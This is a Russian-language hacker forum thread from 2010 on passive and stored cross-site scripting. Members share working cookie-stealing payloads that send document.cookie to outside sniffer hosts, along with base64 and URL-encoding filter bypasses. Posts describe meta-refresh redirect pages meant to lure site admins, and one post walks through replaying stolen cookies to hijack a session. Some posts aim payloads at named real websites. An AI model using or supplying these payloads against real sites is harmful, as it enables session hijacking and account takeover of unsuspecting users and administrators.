RE: Пассивные и Активные XSS - теория и практика
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-01-09 21:37:59.620000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
На всякий случай покажу на примере узявимость htmlspecialchars и htmlentities - две весьма уязвимые функции в PHP при "определенных условиях"(с): Если значение после обработки htmlspecialchars или htmlentities попадает в ссылку, например "URL домашней странички" на форуме (той же булке непроапдейтенной ручками), то возможен XSS, что с успехом подтверждает следующий код:
<?php
$a = "javasсriрt:document.write('<sсriрt>alert(0)</sсriрt>');";
$data = htmlspecialchars($a);
echo "<a href=$data>Tikni</a>";
?> просто запустите и удивитесь сильно PS: Посмотрите исходники странички перед тем, как тыкнуть, и ваще опупейте) *код отсюда копировать не надо, фильтр данного форума, наберите ручками, три строчки всего*
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-01-12 08:42:07.553333
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
привет, а что делать если длины поля нехватает (30 символов). я подделываю запрос и пишу типа quote:
<script>javascript:alert("hello")</script> а он обрезает собаченок. quote:
<script>javascript:alert("hell а так работает quote:
<script>alert('1234')</script> помогите? мне надо статистику от гугла прикрутить на сайт, а они говорят "К сожалению, на данный момент нельзя." ?
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-01-12 18:52:13.456666
|
|
|
sector28
Сообщений: 29
Оценки: 0
Присоединился: 2009-08-27 20:28:58.750000
|
GoldCode, можно попробовать запросить скрипт со своего сервака а если итак длинно будет использовать какойнить сервис сокращения урл bit.ly например.. А теперь о моей проблеме) запихиваю хсс в айфрейм, из под хрома и файрфокса все прекрасно работает, а гребаный 8й эксплорер выдает сообщения типа запрос был изменен для предотвращения хсс, как от этого избавится??
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-01-23 19:49:17.713333
|
|
|
MuTaToR
Сообщений: 55
Оценки: 0
Присоединился: 2008-05-26 11:48:42.893333
|
А через XSS Можно залить шелл?
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-01-25 15:59:16.620000
|
|
|
sector28
Сообщений: 29
Оценки: 0
Присоединился: 2009-08-27 20:28:58.750000
|
хотелось бы знать как):)
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-01-25 16:29:49.600000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: MuTaToR А через XSS Можно залить шелл? можно, есть даже целые эксплойты на основе этого, определенная ссылка подсовывается админу ресурса и получается шелл, т.е. как бы имитация действий админа (обычно по установке какого-нибудт плагина и etc.)
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-01-26 02:35:42.583333
|
|
|
Elisaveta
Сообщений: 58
Оценки: 0
Присоединился: 2009-11-16 01:45:21.883333
|
Снова - Мир вашему дому!милые и отзывчивые участники сего форума.Благодарю за полезную информацию.Побаловалась на досуге из уроков для начинающих с разными шеллами(начала учиться сама криптовать участки кода,чтобы анти-вирусы так не роптали.В итоге получилось немного переделать не шелл-код, а bat-worm на ассемблере(какой замечательный язык)однако дальше просмотра справочника прерываний,основ языка,установки MASM32 и компиляции примера-дело не пошло.Пока мозги от обилия информации плавятся.Ну ничего,дайте мне только время.Bat-worm включал матюгальник контролёра заразы даже в текстовом варианте.Он орал,антивирус, как потерпевший.Теперь-же,как там в тексте-не издаёт и писку)однако работает))может я и не права,но неправильный результат-тоже результат))),пробовала ставить Denver и апач-сервер на локальную машину.(AppServ v.2.6)Пока всё в шоколаде и мир видится только в виртуальном розовом цвете. По-ходу моего пазла нарылся ещё один вопрос о XSS: Если мне не изменяет моя девичья память ,в шестом номере за прошлый год была задача об обходе самописной XSS.(Раздел-Easy Hack.)И был там представлен на всеобщее обозрение следующий html-код: —————————————————————————————————— <%@ page language="java" contentType="text/html; charset=UTF-8" pageencoding="UTF-8"%> <%@page import="org.apache.commons.lang.StringEscapeUtils" %> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; sharset=UTF-8"> <title>XSS-генератор</title> </head> <bоdу> <% for(long i=0; i< 0x100; i++) { long lt = 0x3C; long gt = 0x3E; long order = i << 8; long LT = order | lt; //out.println(Long.toHexString(LT) + " : "); long GT = order | gt; //out.println(Long.toHexString(GT) + "<BR>"); String thesсriрt = (char)LT + "sсriрt" + (char)GT + "alert(" + i + ");" + (char)LT + "/sсriрt" + (char)GT; out.println( thesсriрt + "<br>"); } %> </bоdу> </html> —————————————————————————————————- генерирующий,как написано, 256-вариаций для организации преодоления фильтра: Авторы настоятельно рекомендуют распечатать результаты исполнения.-А если у меня прибора для печати нет в наличии?!То есть есть.Цельных два.Но они редиски забастовку устроили.Без краски печатать пролетариату нахаляву не хотят.И как его исполнить?В предварительном просмотре есть заголовок XSS-генератор и страничка с кодом показана,однако где-же обещанные 256 вариаций. Засим интересуется гражданка зело-как правильно заюзать этот html-код.Объясните что-к-чему.(И не ругайтесь если что,-ведь я ещё только развиваюсь…) P.S. всех С наступившим 2010! ничё, что я пост немного поуже сделал? rgo Сенк ю Меня терзают смутные сомнения,что я сама нашла ответ на свой вопрос в сказках XSSахиризады.(Блин,скрипт перепечатала,потом глянула,-а он диске был,редиска.)
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-01-30 11:10:25.120000
|
|
|
lamerrr
Сообщений: 6
Оценки: 0
Присоединился: 2010-01-30 09:15:04.040000
|
уважаемые, тоесть если я правильно понял то использовать хсс можно, но сработает только если юзер нажмет на кнопку ака ядовитую ссыль, а если к примеру узнать пасс прям на сайте произвольного юзера(тобишь зная только логин) можно это сделать?? то есть как я понял суть заключается в том что находя хсс можно заставить сайт выполнить код или скрипт в зависимости от крутости фильтра, а вот если сразу изменить пасс для какогото логина ??, ктото пытался так зафигачить?? слышал гдето что можно ), обьясните плиз ламеру=)) ><"/<sсriрt />alert()</sсriрt>
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-01-30 19:37:45.460000
|
|
|
xAdidos
Сообщений: 128
Оценки: 0
Присоединился: 2010-01-30 06:29:52.170000
|
Статья зачетная . Автору респект.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-01-31 04:08:03.710000
|
|
|
yse890
Сообщений: 40
Оценки: 0
Присоединился: 2010-01-31 03:55:06.410000
|
Приветствую всех, вопрос как вместо алерт(/xss/) вставить ссылку на снифер ,ниже приведен пример в базе 64 <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss"><script type="text/ecmascript">alert("XSS");</script></svg> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov L3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm 9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPS IxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcm lwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-01-31 17:15:07.823333
|
|
|
yse890
Сообщений: 40
Оценки: 0
Присоединился: 2010-01-31 03:55:06.410000
|
не ужели не кто так и не знает как ответить на заданный вопрос… знаю одно, Тэг <embed> не фигурирует в спецификации HTML с расширением html ,php,gif,js и.т.д скрипт не откроет ссылку на снифер так как Тэг стоит <embed ,если только с расширением swf музыкальный файл, но как? пробовал вместо alert(xss); поставить так url(http://ссылка на снифер.swf);но не чего не вышло плиз кто- нить ответьте.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-01-31 21:02:56.300000
|
|
|
yse890
Сообщений: 40
Оценки: 0
Присоединился: 2010-01-31 03:55:06.410000
|
разобрался сам,если кому пригодится вместо alert("XSS"); вставляем вот это img = new Image();img.src = "http://snifer.ru/Language_/s.gif?"+document.cookie; и куки приходят ,но вот когда этот скрипт кодирую в базу 64 выбивает синтаксическая ошибка после кодировки, кто подскажет почему? <svg xmlns:svg="http://www.w3.org/1999/svg" xmlns="http://www.w3.org/1999/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss"><script language='javascript' type='text/ecmascript'>img = new Image();img.src = "http://snifer.ru/Language_/s.gif?"+document.cookie;</script></svg>
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-02-02 18:36:52.526666
|
|
|
0xakir
Сообщений: 29
Оценки: 0
Присоединился: 2010-02-02 13:09:41.686666
|
Можно предоставить всю полную информацию для этого метода взлома, а в смысли что именно нада? Выложите программы какие надо и скрипты что бы не искать по нету. Заранее спасибо!
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-02-04 19:53:10.033333
|
|
|
tеstеr
Сообщений: 377
Оценки: -46
Присоединился: 2008-02-08 17:56:40.563333
|
quote:
ORIGINAL: GoldCode привет, а что делать если длины поля нехватает (30 символов). Используй короткие ссылки http://void.by/2009/03/04/20_short_url_sites/ <script src=short.site/1231/> Хотя, в 30 символов вряд-ли уложишься, но попробовать стоит.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-02-09 13:41:45.796666
|
|
|
yse890
Сообщений: 40
Оценки: 0
Присоединился: 2010-01-31 03:55:06.410000
|
плиз подскажите как сделать ссылку на снифер ,если исполняется только этот скрипт в браузере (OPERA) <IMG SRC="javascript:alert('XSS');"> и больше не какой , не исполняется<script>alert(/XSS/)</script>
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-02-09 15:52:41.253333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
также и сделать, вместо alert('XSS'); вставить: window.location.href='http://site.ru/s.gif?'+document.cookie; где s.gif - твой снифер, или просто s.php, если без маскировки под картинку
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-02-11 01:48:06.676666
|
|
|
yse890
Сообщений: 40
Оценки: 0
Присоединился: 2010-01-31 03:55:06.410000
|
Спасиб, а есть какой нить пример на подобие этого только с алертом, такими Тэгами как <div class="text"> заранее блг…
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-02-11 22:12:27.700000
|
|
|
MuTaToR
Сообщений: 55
Оценки: 0
Присоединился: 2008-05-26 11:48:42.893333
|
А кто-нибудь знает физичиский путь до root папки на хосте 7host.com? для xss shela нужны я для безплатного хоста никак немогу найти…
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-02-13 12:43:27.183333
|
|
|
yse890
Сообщений: 40
Оценки: 0
Присоединился: 2010-01-31 03:55:06.410000
|
плиз подскажите как реализовать этот код в базу 64 <a href="" onMouseOver="alert('Your Message');return true;">Linked Text</a> примерно чтоб выглядело так <a href="data:text/html;base64, b25Nb3VzZU92ZXI9ImFsZXJ0KCdZb3VyIE1lc3NhZ2UnKQ==">Linked Text</a> важно как закодировать этот кусок кода в базу 64 onMouseOver="alert('Your Message') у меня че то не выходит
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-04-29 15:20:45.453333
|
|
|
Elisaveta
Сообщений: 58
Оценки: 0
Присоединился: 2009-11-16 01:45:21.883333
|
Тебе нужен способ или результат? Если первое - извини,рада бы,-да сердцем чувствую,забанят. А если второе,-то может быть так: H4sIAPNp2UsC/8vP880vLU71L0stslVKzEktKtFQj8wvLVLwTS0uTkxPVdcEAITsJ2MiAAAA или так? H4sIAItp2UsC/7NJVMgoSk2zVVJSyM/zzS8tTvUvSy2yVUrMSS0q0VCPzC8tUvBNLS5OTE9V17Qu Si0pLcpTKCkqTbVWsvPJzMtOTVEISa0osdFPtAMAPGaOd0sAAAA= Или даже так: data:text/html;base64,b25Nb3VzZU92ZXI9ImFsZXJ0KCdZb3VyIE1lc3NhZ2UnKQ==;return true;">Linked Text</a> <html> <bоdу> data:text/html;base64,b25Nb3VzZU92ZXI9ImFsZXJ0KCdZb3VyIE1lc3NhZ2UnKQ==;return true;">Linked Text</a> </bоdу> </html>
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-05-04 22:05:50.476666
|
|
|
Elisaveta
Сообщений: 58
Оценки: 0
Присоединился: 2009-11-16 01:45:21.883333
|
У меня опять вопрос по XSS,если можно.Нет,не о поисках насущных,а о реализации. (это не взлом,а проверка безопасности и вообще от многого немножкА,не кража а делёжка) Я тут давеча на сетевой помойке mp3 рыскала.Десять минут.Нашла.То что искала.И ещё кое-что. (Вот уж не думала что в сети так много уязвимых ресурсов.Как грязи.) Из десяти просмотреных мною сайтов-десять имели XSS,а два из них ещё и скулю. Почтовые ящики бдительные администраторы скрыли от честных глаз людских.(и от моих тоже) Наивные.Я ведь как и подобает законопослушной порядочной гражданке захотела сообщить о найденой уязвимости(а они сами не хотят)правда mail им скрыть от меня не удалось, как и настоящие IP серверов.но всё же.)) Интересует меня вот что:как можно реализовать XSS если почтовик админа находится на другом ресурсе (а на нём-то XSS уязвимости нет.И пошлёт он меня с моей ссылкой далеко-далеко. А хотелось-бы наверняка ужалить)Вот если бы он как все белые люди держал админку с возможностью отправлять ему сообщения-тогда другое дело.Можно было-бы ему из под юзера весточку или картинку какую отправить.C найдёнышем.А потом на снифер проветриться. Даже не знаю что предпринять.Правда есть возможность оставлять комментарии простым смертным на страничке.Ссылку закодировать и вставить где-нибудь.В людном месте. Но только жди его.Желанного администратора.Лет десять. Вот какие есть у меня варианты: http://mp3**.ru/?q=%22%3E%3Csсriрt%3Ealert(0)%3C/sсriрt%3E - XSS "><sсriрt>alert(0)</sсriрt> ——————————– IP сервера: *.*.*.* e-mail: *******@gmail.com —————————————————————————————— "><sсriрt>window.location.href='http://httpz.ru/lt3mid3cqm.png'+document.cookie;</sсriрt> http://mp3**.ru/?q="><sсriрt>window.location.href='http://httpz.ru/lt3mid3cqm.png'+document.cookie;</sсriрt> http://mp3**.ru/?q="><sсriрt>window.location.href='http://httpz.ru/lt3mid3cqm.png'+document.cookie;<sсriрt>history.go(-1)</sсriрt> ____________________________________________________________________________________________________________ http://mp3**.ru/?q=%22%3E%3Csсriрt%3Ewindow.location.href%3D'http%3A%2F%2Fhttpz.ru%2Flt3mid3cqm.png'%2Bdocument.cookie%3B%3C%2Fs%D1%81ri%D1%80t%3E http://mp3**.ru/?q=%22%3E%3Csсriрt%3Ewindow.location.href%3D'http%3A%2F%2Fhttpz.ru%2Flt3mid3cqm.png'%2Bdocument.cookie%3B%3Cs%D1%81ri%D1%80t%3Ehistory.go(-1)%3C%2Fs%D1%81ri%D1%80t%3E ————————————————————————————————————————————————————- <html> <bоdу> <a href="data:text/html;base64,Ij48c2NyaXB0PmFsZXJ0KDApPC9zY3JpcHQ+"><image src=http://httpz.ru/lt3mid3cqm.png></a> </bоdу> </html> —————————————————————————————————————————————————— ################################################################################### Какой у нас конструктивный монолог. Данную тему снимаю..,На время. (со всеми методами впаривания XSS-ссылки+сниффер разберусь попозже.Даже не сомневайтесь что расковыряю). На досуге зародился свой,оригинальный вариант (не публикую-знаю зарежете) Однако хотелось бы иметь множество вариаций и понять - что,куда,зачем и сколько. (Мой способ более изящнен чем общепринятый стандарт пользительного дела). Кстати о птичках My Site php не поддерживает,-скрипты заливать не могу.Лишили тех.поддержки. (А раньше хостинг такую услугу предоставлял.Нахаляву.+ 400 Гб места порезвиться) (Жадные,жалкие,ничтожные хостеры)подсуетились уже))Пришлось обойтись без php пламенной поддержки.:D Пока некогда заморачиваться c XSS - появились новые пакостные идеи. Да и новый ][ надо изучить.Досконально.Разобрать Dvd на запчасти.Там опять тааак много вкусного. О-о-о,-Этот номер вам особенно удался. (правда получаю его с задержкой детонации.Но что поделаешь,- приходится мириться с издержками месторасположения.Однако лучше позже,чем никогда.) Побегу.Расти над собой.некогда тут с вами XSS глупостями заниматься. Да и один добрый мирожитель обещал VPN-сети строить научить и ботнет писать.Надо успеть урвать информацию пока он добрый. (Узрят тогда враги наши - мою первую программу с полиметаморфным шифрованием исходного кода)) Нет,это не ботнет.Сие будет пользоносное приложение.))) Разобрать можно любого пациента,вопрос только - сколько времени займёт вскрытие.(Доктор сказал в морг - значит в морг.) —————————————————————————————————————————————————— P.S.Дико извиняюсь что не по теме.Но просто не могу удержаться от слов благодарности в адрес администрации журнала ][. -Пускай вам всем по жизни светит только зелёный свет!<Green> НОнишний номер,(ну тот который красный<Red> как пожарная машина) -Выше всяческих похвал.Во всех темах)) P.P.S.Надеюсь вы меня простите за длинные тексты и отвлечения от темы. (ну не умею я по другому). Ещё хотелось бы узнать когда новая версия метасплойта выйдет? Засим прощаюсь(На время)И Желаю чтобы все!(и мне того-же) ————————————————————————— Всего вам самого наилучшего!!! ………………………………………… Ваша резидент ][ - Elisaveta + любимое чудовище.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-05-18 15:21:14.813333
|
|
|
sector28
Сообщений: 29
Оценки: 0
Присоединился: 2009-08-27 20:28:58.750000
|
Это так, чтобы разнообразить скучные будни… http://kav.rol.ru/?userkey=aaaaaaa не фильтруется…(5 ссылка)
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-06-13 20:57:06.123333
|
|
|
zadrotina
Сообщений: 2
Оценки: 0
Присоединился: 2010-06-13 14:06:14.596666
|
а что если вместо A4прокси использовать ТОР? насколько безопасно его для анонимности испоьзовать?… надеюсь меня поймут…
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-07-15 16:45:04.080000
|
|
|
RGentum
Сообщений: 15
Оценки: 0
Присоединился: 2010-06-28 15:27:25.206666
|
Друзья, я не пойму, когда я нашел несколько мест XSS на сайте, обязательно ли участие админа после приготовления ссылки со сниффером? ну в смысле чтобы он кликнул по ссылке и т.п. Может как-то можно без этого обойтись? просто админ-то уж не из лохов там сидит… И еще, скажите пожалуйста как закодировать строку ссылки? как называется кодировка? (ну типа %45%5F%3A%10%2E%32) а дальше я уж сам найду…
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-07-15 17:06:46.483333
|
|
|
Зюзюка
Сообщений: 29
Оценки: 0
Присоединился: 2010-06-13 10:08:22.086666
|
Если пассивная, то участие требуется (чтобы админ незаподозрил, XSS можно зашифровать в url-код)
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-07-15 17:15:31.576666
|
|
|
RGentum
Сообщений: 15
Оценки: 0
Присоединился: 2010-06-28 15:27:25.206666
|
а в случае с активной? можно ли избежать его участия? в моем случае уязвимость помоему активная.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-07-15 17:18:48.200000
|
|
|
Зюзюка
Сообщений: 29
Оценки: 0
Присоединился: 2010-06-13 10:08:22.086666
|
С активной нет Где ты нашел место XSS в поиске или в других полях?
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-07-15 17:25:30.830000
|
|
|
RGentum
Сообщений: 15
Оценки: 0
Присоединился: 2010-06-28 15:27:25.206666
|
quote:
ORIGINAL: Зюзюка С активной нет Где ты нашел место XSS в поиске или в других полях? в других полях. параметр id не фильтруется в запросе… т.е. участие админа требуется и в активной и в пассивной в любом случае, да?
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-07-15 17:30:17.140000
|
|
|
Зюзюка
Сообщений: 29
Оценки: 0
Присоединился: 2010-06-13 10:08:22.086666
|
В активной нет, в пассивной да
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-07-15 17:37:23.703333
|
|
|
RGentum
Сообщений: 15
Оценки: 0
Присоединился: 2010-06-28 15:27:25.206666
|
немного запутался:) тогда так: в каком именно случае и как можно избежать его участия? ведь урл-код будет глуповато смотреться после "id=", согласись:D
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-07-25 00:07:58.930000
|
|
|
Barbariskin
Сообщений: 1
Оценки: 0
Присоединился: 2010-07-24 23:54:51.436666
|
Начитался, вроде вышло. Пробовал на себе =) Нашел (наверное пассивную XSS) Зарегился на этом портале Сделал ящик на mail.ru в бажное поле вставил вот это
"><script>img = new Image();img.src="http://www1.hut.ru/testi.shtml?123"+document.cookie;</script> Скопировал из адресной строки полученную ссылку отправил сам себе эту ссылку на маил.ру Не разлогиниваясь с того портала в мозиле удалил куки, принадлежавшие этому порталу после обновил страницу, убедился что на портале я уже не авторизован зашел в маил.ру, перешел по злой ссылке зашел в сниффер скопировал куки и подставил их себе перешел на портал, обновил страницу и оказался опять залогиненым. Целый день втыкал. Может пригодится кому-нибудь.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-07-25 14:11:45.883333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
quote:
ORIGINAL: RGentum немного запутался:) тогда так: в каком именно случае и как можно избежать его участия? ведь урл-код будет глуповато смотреться после "id=", согласись:D Создай файл index.html с таким содержанием: <html>
<meta http-equiv="refresh" content="1; url=http://site.com/?id=XSS">
</html> Далее создай сайт (можно на narod.ru), залей этот файл и скинь ссыль админу на этот файл ____________________________ где http://site.com/?id=XSS - ссыль на xss XSS зашифруй в url-cod Т.е. воспользуйся методом переадресации PS: код тебе придется писать самому, т.к. на форуме стоит фильтр
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-07-25 23:30:44.390000
|
|
|
tupakragq
Сообщений: 1
Оценки: 0
Присоединился: 2010-07-25 23:04:39.956666
|
"><sсriрt>img = new Image();img.src="http://www1.hut.ru/testi.shtml?123"+document.cookie; </sсriрt> в данном случае простая картинка или её надо модернизировать, дописать что-либо если да то что? Заранее спасибо
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-07-26 12:24:29.150000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
quote:
ORIGINAL: tupakragq "><sсriрt>img = new Image();img.src="http://www1.hut.ru/testi.shtml?123"+document.cookie; </sсriрt> в данном случае простая картинка или её надо модернизировать, дописать что-либо если да то что? Заранее спасибо Если xss пассивная, то создай файл index.html с таким содержанием: <html>
<meta http-equiv="refresh" content="1; url=http://site.com/?search=%22%3E%3C%73%441%72%69%440%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%69%6D%67%2E%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%31%2E%68%75%74%2E%72%75%2F%74%65%73%74%69%2E%73%68%74%6D%6C%3F%31%32%33%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%441%72%69%440%74%3E">
</html> Залей этот файл на свой сайт и скинь админу посмотреть… все куки полетят на сниффер. Где %22%3E%3C%73%441%72%69% … - это "><sсriрt>img = new Image();img.src="http://www1.hut.ru/testi.shtml?123"+document.cookie; </sсriрt> в url-коде
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-07-26 18:04:29.426666
|
|
|
#WolfNet#
Сообщений: 1
Оценки: 0
Присоединился: 2010-07-26 17:57:31.826666
|
Здрасте:) Я тут новичок на форуме и в XSS еще ничего не понимаю. Просветите, пожалуйста, куда вставлять скрипт "<sсriрt>img = new Image(); img.src = "http://www1.hut.ru/anek.shtml?"+document.cookie;</sсriрt>" на форум, для проверки XSS?
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-07-29 11:10:07.393333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
quote:
ORIGINAL: #WolfNet# Здрасте:) Я тут новичок на форуме и в XSS еще ничего не понимаю. Просветите, пожалуйста, куда вставлять скрипт "<sсriрt>img = new Image(); img.src = "http://www1.hut.ru/anek.shtml?"+document.cookie;</sсriрt>" на форум, для проверки XSS? Необязательно вставлять именно это: quote:
<sсriрt>img = new Image(); img.src = "http://www1.hut.ru/anek.shtml?"+document.cookie;</sсriрt> Достаточно написать: <blablabla> (например в поиске по сайту). Если останется такой же текст в поле, то значит уязвимость есть.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-08-09 09:05:19.953333
|
|
|
DimasOpsy
Сообщений: 3
Оценки: 0
Присоединился: 2010-08-06 16:11:13.926666
|
Ребята, подскажите каким образом ипользовать найденую уязвимость: nickname=%22%3E%3Csсriрt%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fsсriрt%3E%3C%22&login=1&pas sword=1&action_login=1 ?! На экране при вводе пароля проявдяется в углу <""> Но как дальше взламывать, не имею ни малейшего представления! Добавлено через 25 минут Короче, стоит форма для запроса авторизации с концовкой auth.asp. Дальше я прописываю ?nickname=%22%3E%3Csсriрt%3Ealert%28%27PTsecurity+ S canner+Test%27%29%3C%2Fsсriрt%3E%3C%22&login=1&pas sword=1&action_login=1 и он выдаёт <""> Я так понял, что нуж но вставить скрипт выполняющий открытие таблица с логами, если его вставить в auth.asp?nickname=%22%3E%3Csсriрt%3E !!!ТУТ!!! %3C%2Fsсriрt%3E%3C%22&login=1&pas sword=1&action_login=1. НО какой именно я не знаю, кто подскажет что делать дальше?! Короче, выделеной ошибкой считается POST /auth.asp HTTP/1.1 nickname=&login=&password=&action_login=
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-08-25 15:59:41.090000
|
|
|
Vampirereal
Сообщений: 1
Оценки: 0
Присоединился: 2010-08-24 13:20:25.143333
|
Про поиск XSS и обход фильтров классно написано, уже нашёл несколько "уязвимостей", сейчас пытаюсь с вКонтактом разобратся и тут встал вопрос во время тестирования снифера: quote:
ORIGINAL: Pashkela ** Дадим ссылку админу на скрипт.Подождём пока админ не посмотрит на ссылку и куки не уйдут на http://www1.hut.ru/aneksniff/sniffer.txt , периодически просматриваем лог…ищем куки админа. далее остаёться только подменить свои кукис на перехваченные, на сайте-жертве. Заходим в A4 Proxy во вкладку Browser options в поле Variable пишем Cookie в поле Replace with… копируем из лога сниффера http://www1.hut.ru/aneksniff/sniffer.txt содержимое переменной query и нажимаем кнопочку add.(прим. - тоже самое можно сделать в ОПЕРА - Инструменты - Дополнительно - Управление cookies - название сайта - изменить) Всё заходим на сайт как админ. Там ведь нет переменной query??? Всё что есть полезного в логе снефера: ИП адрес жертвы (юзера), хост, браузер, и некоторые подробности ОС, конфа (таблетПС например). И где оттуда брать куки не понимаю? На всякий случай проинсталил сначала на локалхосте а потом в интернете на качественном хостинге снифер от FriLL - та же фигня, правда дизайн админки разный. Удобно конечно: приходит отчёт по аське о каждой новой жертве. Приставка ?c=document.cookie изменяет лишь надпись в логе снифера. Может я не те сниферы юзаю? Как куки то оттуда выжать чтоб в браузер воткнуть? Вернее как воткнуть я знаю, а вот как забрать их из лога снифера - не понял. Следующий вопрос: проясните, зачем нужна программка A4 Proxy, прекрасно видно как там отображаются кукисы с посещённых страниц где я залогинен, но свои кукисы я могу и так достать и заменить в настройках браузера.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-10-14 16:29:17.510000
|
|
|
Norton710
Сообщений: 3
Оценки: 0
Присоединился: 2009-04-04 14:17:22.870000
|
Столкнулся с проблеммами при поиске XSS на одном форуме (булка 4) 1) На этом форуме стоит фильтр, изменяющий символы < > " , а точнее переводящий их в Hex кодировку. Остальная часть скрипта остаётся целой и не вредимой… Пробовал менять кодировку символов в юникод, но после этого скрипт вобще не запустился) Но что самое прикольное, в исходном коде странице с перекодированными символами, скрипт лежит совершенно целый <script>alert('Norton710')</script> и это поставило меня в тупик) Что мешает рабочему коду работать?) 2) На этом же форуме спалил возможность добавления [JPG][/JPG] . Вбил туда прямой путь на картинку из под сниффера - отлично загрузилась и даже парочку IP адресов увела у форумчанинов =P Дальше попробовал поставить пробел после ссылки и опять же - картинка загрузилась =) Но при попытке вставить любой простейший скрипт (допустим тот же самый alert), картинка вобще убивается и не загружается.. Активное XSS возможно? Или фильтр всё обламывает?..
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2010-10-24 16:43:28.860000
|
|
|
Kronst
Сообщений: 91
Оценки: 0
Присоединился: 2010-10-13 21:15:21.010000
|
спс
|
|
|
|
|